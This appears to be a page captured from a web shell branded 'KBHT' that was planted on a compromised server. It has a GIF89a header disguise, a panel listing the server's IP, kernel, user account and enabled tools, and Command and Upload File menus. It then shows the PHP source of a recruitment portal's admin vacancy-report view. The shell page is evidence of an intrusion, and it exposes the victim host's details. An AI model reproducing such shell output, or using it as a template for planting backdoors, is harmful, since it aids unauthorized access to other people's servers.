GIF89a; CRX
KBHT HEHE
Server IP : 172.26.0.195  /  Your IP : 3.22.70.169
Web Server : Apache
System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : jnclnmuac ( 1026)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/jnclnmuac/public_html/web/../admission/../jobs/application/views/admin/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jnclnmuac/public_html/web/../admission/../jobs/application/views/admin/vacancies.php
<!doctype html>
<html lang="en">
    <head>
        <!-- Required meta tags -->
        <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <title>Vacancy Report :: <?php echo $this->session->userdata("branchData")["branch_short_name"]; ?> | Recruitment Portal</title>
        <link rel="stylesheet" href="<?php echo base_url("assets/admin/css/style-liberty.css"); ?>">
        <link rel="image icon" href="<?php echo base_url("/assets/images/logo.png"); ?>">
        <link rel="stylesheet" href="<?php echo base_url("assets/admin/css/jquery.dataTables.min.css"); ?>" type='text/css' />
        <link href="https://fonts.googleapis.com/css?family=Nunito:300,400,600,700,800,900&amp;display=swap" rel="stylesheet">
        <script src="<?php echo base_url("assets/admin/js/jquery-1.10.2.min.js"); ?>"></script>
        <script src="<?php echo base_url("assets/admin/js/bootstrap.min.js"); ?>"></script>
        <script src="<?php echo base_url("assets/admin/js/jquery.dataTables.min.js"); ?>"></script>
    </head>
    <body class="sidebar-menu-collapsed">
        <?php
        $this->load->view("admin/navAndHeader");
        ?>
        <!-- main content start -->
        <div class="main-content">
            <!-- content -->
            <div class="container-fluid content-top-gap">
                <nav aria-label="breadcrumb">
                    <ol class="breadcrumb my-breadcrumb">
                        <li class="breadcrumb-item"><a href="<?php echo site_url("admin/Dashboard") ?>">Home</a></li>
                        <li class="breadcrumb-item active" aria-current="page">Vacancy Management</li>
                        <li class="breadcrumb-item active" aria-current="page"><a href="">Vacancy Report</a></li>
                    </ol>
                </nav>
                <section class="data-tables">
                    <div class="card card_border p-4">
                        <h3 class="card__title"><i class="fa fa-table"></i> &nbsp;Vacancy Report</h3><br>
                        <div class="table-responsive">
                            <?php if ($this->session->flashdata('successMessage')) { ?>
                                <div class="alert alert-success"> <strong><?php echo $this->session->flashdata('successMessage'); ?></strong></div>
                            <?php } ?>
                            <?php if ($this->session->flashdata('errorMessage')) { ?>
                                <div class="alert alert-danger"> <strong><?php echo $this->session->flashdata('errorMessage'); ?></strong> </div>
                            <?php } ?>

                            <button class="btn btn-sm btn-primary" onClick="window.location.href = '<?php echo site_url("admin/Vacancy/createVacancy"); ?>'" tooltip="Add New Vacancy"><i class="fa fa-plus"></i> Add New Vacancy</button><br><br>    
                            <table id="vacancies" class="bootstrap-datatable table-striped table-hover" style="width:100%">
                                <thead>
                                    <tr>
                                        <th>Sr. No</th>
                                        <th>Designation</th>  
                                        <th>No. Of openings</th>
                                        <th>Opening-Ending Date</th>
                                        <th>Session</th>
                                        <th>Department</th>
                                        <th>Category</th>                                     
                                        <th>Added On</th>
                                        <th>Last Updated On</th>
                                        <th>Action</th>
                                    </tr>
                                </thead>
                                <tfoot>
                                    <tr>
                                        <th>Sr. No</th>
                                        <th>Designation</th>  
                                        <th>No. Of openings</th>
                                        <th>Opening-Ending Date</th>
                                        <th>Session</th>                                  
                                        <th>Department</th>
                                        <th>Category</th>                                     
                                        <th>Added On</th>
                                        <th>Last Updated On</th>
                                        <th>Action</th>
                                    </tr>
                                </tfoot>
                                <tbody>
                                    <?php
                                    for ($i = 0; $i < sizeof($vacancies); $i++) {
                                        $record = $vacancies[$i];
                                        ?>
                                        <tr>
                                            <td><?php echo ($i + 1); ?></td>
                                            <td><?php echo stripslashes($record->desig_name); ?></td>  
                                            <td><?php echo stripslashes($record->no_of_openings); ?></td>  
                                            <td><?php echo date("d-m-Y", strtotime($record->start_date))." To ".date("d-m-Y", strtotime($record->end_date)); ?></td>  
                                            <td><?php echo stripslashes($record->session_name); ?></td>                                         
                                            <td><?php echo stripslashes($record->dm_name); ?></td>   
                                            <td><?php echo stripslashes($record->cm_name); ?></td>  
                                            <td><?php echo date("d-m-Y H:i:sa", strtotime($record->vm_added_on)); ?></td>  
                                            <td><?php echo date("d-m-Y H:i:sa", strtotime($record->vm_updated_on)); ?></td>  
                                            <td>
                                                <?php
                                                if ($record->vm_delete_status == "F") {
                                                    ?>                                              
                                                    <i class='fa fa-edit' onClick="window.location.href = '<?php echo site_url("admin/Vacancy/editVacancy/$record->vm_id") ?>'" style='color:#002166;cursor: pointer;' title="Edit Vacancy Detail"  ></i>
                                                    <?php
                                                    if ($record->vm_active_status == "T") {
                                                        ?>
                                                        <i class='fa fa-ban' onClick="window.location.href = '<?php echo site_url("admin/Vacancy/toggleVacancyStatus/$record->vm_id/F") ?>'"style='color:#FF0000;cursor: pointer;' data-toggle="tooltip" title="Click To Disable Vacancy" ></i>
                                                        <?php
                                                    } else {
                                                        ?>
                                                        <i class='fa fa-check-circle' onClick="window.location.href = '<?php echo site_url("admin/Vacancy/toggleVacancyStatus/$record->vm_id/T") ?>'" style='color:#297534;cursor: pointer;' data-toggle="tooltip" title="Click To Enable Vacancy"  ></i>
                                                        <?php
                                                    }
                                                    ?>
                                                    <i class='fa fa-trash' onClick="window.location.href = '<?php echo site_url("admin/Vacancy/toggleVacancyDeleteStatus/$record->vm_id/T") ?>'" style='color:#FF0000;cursor: pointer;' data-toggle="tooltip" title="Click To Delete Vacancy" ></i>
                                                    <?php
                                                } else {
                                                    ?>
                                                    <span ><?php echo "Vacancy deleted on" . date("d-m-Y H:i:sa", strtotime($record->vm_updated_on)) . ". Click to undo." ?></span>
                                                    <i class='fa fa-undo' onClick="window.location.href = '<?php echo site_url("admin/Vacancy/toggleVacancyDeleteStatus/$record->dm_id/F") ?>'" style='color:#297534;cursor: pointer;' data-toggle="tooltip" title="Click To Un-Delete Vacancy"  ></i>
                                                    <?php
                                                }
                                                ?>
                                            </td>
                                            <?php
                                        }
                                        ?>
                                    </tr>
                                </tbody>
                            </table>
                        </div>
                    </div>
                </section>
            </div>
            <!-- //content -->
        </div>           
    </div>
    <!-- main content end-->
    <?php
    $this->load->view("admin/footer");
    ?>
    <script>
        $(document).ready(function () {
            $("#vacancies").DataTable({responsive: true, dom: 'Blfrtip'})
        });
        $(document).ready(function () {
            document.getElementById("dashboard").classList.remove("active");
            document.getElementById("dataManagement").classList.remove("active");
            document.getElementById("designation").classList.remove("active");
            document.getElementById("vacancy").classList.remove("active");
            document.getElementById("reports").classList.remove("active");
            document.getElementById("vacancy").classList.add("active");
        });
    </script>

KBHT - 2023